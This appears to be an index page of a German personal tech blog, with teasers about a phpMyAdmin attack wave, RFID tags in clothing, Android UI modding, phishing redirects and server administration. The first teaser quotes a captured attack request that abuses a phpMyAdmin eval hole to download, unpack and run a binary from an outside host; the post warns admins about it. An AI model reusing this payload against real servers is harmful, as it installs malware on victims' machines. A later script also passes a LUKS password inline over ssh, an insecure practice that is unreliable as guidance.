ghcif.de

Seit einigen Tagen haeufen sich die Meldungen ueber gecrackte Server welche Schadsoftware installiert haben, nach einiger Suche konnte der Uebeltaeter ausgemacht werden, es handelt sich um veraltete phpmyadmin Installationen und ein Bot scanned diverse Webs und testet wahllos 2 Exploits:

50.56.100.212 “GET /phpMyAdmin/config/config.inc.php?eval=system(‘echo cd /tmp;wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;curl -O wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;lyxn -DUMP wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl’);

Mehr…

Ich habe eine Mail vom FoeBuD erhalten und mir stehen gerade alle Haare zu Berge, ich bitte Euch den Artikel unbedingt zu verbreiten, Twitter, Facebook, Blogs, etc. es werden hier Aussmasse erreicht welche man sich kaum vorstellen kann, Kleidungsstuecke mit RFID Wanzen welche vom Traeger mitunter ueber ein Jahr getragen werden.
Die Szenarien kann jeder fuer sich selbst ausmalen:

Mit einer spektakulären Aktion vor dem Gerry-Weber-Store in Bielefeld
weist der FoeBuD auf die unsichtbare Gefahr hin

Fotos dazu finden sich auf unserer Website: Mehr…

Da ich ja seit einigen Tagen Besitzer des Galaxy Nexus bin ist der Basteltrieb wieder erwacht in mir und ich dachte ich beginne ein wenig mit UI Modding nachdem mir aufgefallen ist, dass in den Kontakten und beim Anruf eines unbekannten Teilnehmers eine doch recht langweilige Silhouette eines Kopfes zu sehen bekommt.
Ein passender Android in blau war schnell gefunden, danke an Prophet_23 aus dem XDA Forum und nun beginnt der Spass.
Als erstes habe ich mir die Phone.apk vorgenommen welche sich via
$\nexus\phonetemp\> adb pull /system/app/Phone.apk
vom Geraet herunterladen laesst (Root und Android SDK vorrausgesetzt, darauf moechte ich nun nicht naeher eingehen), diese laesst sich via unzip einfach entpacken. Mehr…

Da stehen einem doch die Haare zu Berge wenn man so etwas lesen muss, Netzpolitik.org berichtet ueber eine Backdoor bei den oben genannten Herstellern: Apple, Nokia und RIM.

Nachdem indische Hacker, die sich “Lords of Dharmaraja” nennen, letzte Woche nach eigenen Angaben Teile des Quellcodes von Symantecs “Norton Antivirus” veröffentlichten, legen sie nun brisante Informationen nach:

So sollen laut geleakten indischen Regierungsdokumenten die Smartphone-Hersteller Research in Motion (RIM), Nokia und Apple in ihre Smartphones eine Backdoor eingebaut haben, die es der Regierung ermöglich, die Nutzer der Handys zu überwachen. Beigelegt wurden Protokolle von internem E-Mail-Verkehr der United States-China Economic and Security Review Mehr…

Eigentlich bin ich nicht der Freund davon derartige Ideen auch noch zu verbreiten, jedoch ist die Idee so genial wie einfach und hilft evtl auch beim Debuggen von Problemen weiter.
Der Sachverhalt der vorliegt ist folgender, ein Kunde meldet das beim Aufruf seiner Seite eine andere Seite erscheint und nicht die, die er aufgerufen hat.
Nehmen wir an es handelt sich um die Seite: www.dummypage.tld, beim Aufruf dieser erscheint jedoch www.phishing.tld.
Ein Test mit einem Browser zeigte jedoch dummypage.tld und nicht die vom Kunden gemeldete Seite, der Test mit Opera Mobile jedoch zeigte auf www.phishing.tld, was passiert hier?
Der Test mit dem Android Browser zeigt wiederum auf dummypage.tld.
Moment!
Ein Klick in den Optionen -> DESKTOP Version aus. Mehr…

Ich habe hier eine tolle Idee fuer einen Abenteuerurlaub auf einem sozialen Netzwerk gefunden und den moechte ich nun auf diesem Wege teilen, denn es ist traurig aber doch zu wahr was man hier lesen kann:

Wenn Ihr wirklich etwas erleben möchtet, bereitet Euch doch mal auf ein Abenteuer vor, wie Ihr es Euch niemals hättet vorstellen können:

1. Geht illegal nach Pakistan, Afghanistan, Marokko, in die Türkei oder in den Irak

2. Sorgt euch nicht um Visa, internationale Gesetze, Immigrationsregeln Mehr…

Hallo Mitleser,

ich moechte Euch auf diesem Weg ein gesundes neues Jahr wuenschen, auf das naechstes Jahr ein wenig weniger turbulent wird als das vorgehende, waren in meinen Augen doch ein wenig zuviele Katastrophen, Downratings, Kriege und Leid in aller Welt, hoffen wir das beste.

In dem Sinne bis naechstes Jahr und sprengt Euch nicht selbst in die Luft und bitte auch nicht den ungeliebten Nachbarn.

LG
Milan aka t4c

Da ich meinen Server remote sichere und dieser Server an einem Ort steht zu dem mehr als nur eine Person Zugang haben habe ich mir Gedanken gemacht wie man denn den LuksContainer remote inkl Uebergabe eines Passworts oeffnen kann. Eine Google Recherche zeigte nur Loesungen via Dropbear die ich nur gar nicht brauchen konnte, daher quick, dirty and easy:

#! /bin/bash
echo "opening luks"
ssh user@host 'cryptsetup luksOpen /dev/sdXY backup <<<PASSWORT'
echo "mounting /backup"
ssh user@host 'mount /dev/mapper/backup /backup' Mehr...

Ich habe gerade via G+ einen Link zu einem Video gefunden in welchem eine hochtalentierte Fondsmanagerin ueber Nahrungsmittelspekulation spricht.
In dem etwas anstrengend anzusehenden Video, welches sich durch eine extreme Verwackelung der Kamera auszeichnet und hier den dokumentarischen Flair unterstreichen soll fallen jedoch einige sehr interessante Passagen.
Das Video wurde vom “Zentrum fuer Politische Schoenheit” gedreht und soll nun wenn es nach der Deutschen Bank geht zensiert werden.

Die Deutsche Bank droht mit rechtlichen Schritten und Schadenersatzklage gegen einen Film über Nahrungsmittelspekulationen, sollte nicht eine Passage des Pressesprechers Frank Hartmann herausgenommen werden. Der Pressesprecher wird dahingehend zusammengefasst, dass nicht die Händler von Banken, sondern die Menschen in Mehr…

Nachdem ein kleinerer Fehler im Ebuild fuer PostgreSQL 9.1 unter Gentoo nun behoben wurde, war endlich ein Update der Datenbank auf die neue Version moeglich, da es hier unter Umstaenden die eine oder andere kleine Huerde gibt, hier nun der Weg um die neue Datenbank zu nutzen und die alten Daten zu importieren:

Nach dem emergen der Version 9.1 kopieren wir die Configfiles der Version 9.0 auf die 9.1:
cp -R /etc/postgresql-9.0/* /etc/postgresql-9.1/*

Mit dem User ‘postgres’ wird nun eine neue Datenbank erstellt:

su - posgres Mehr...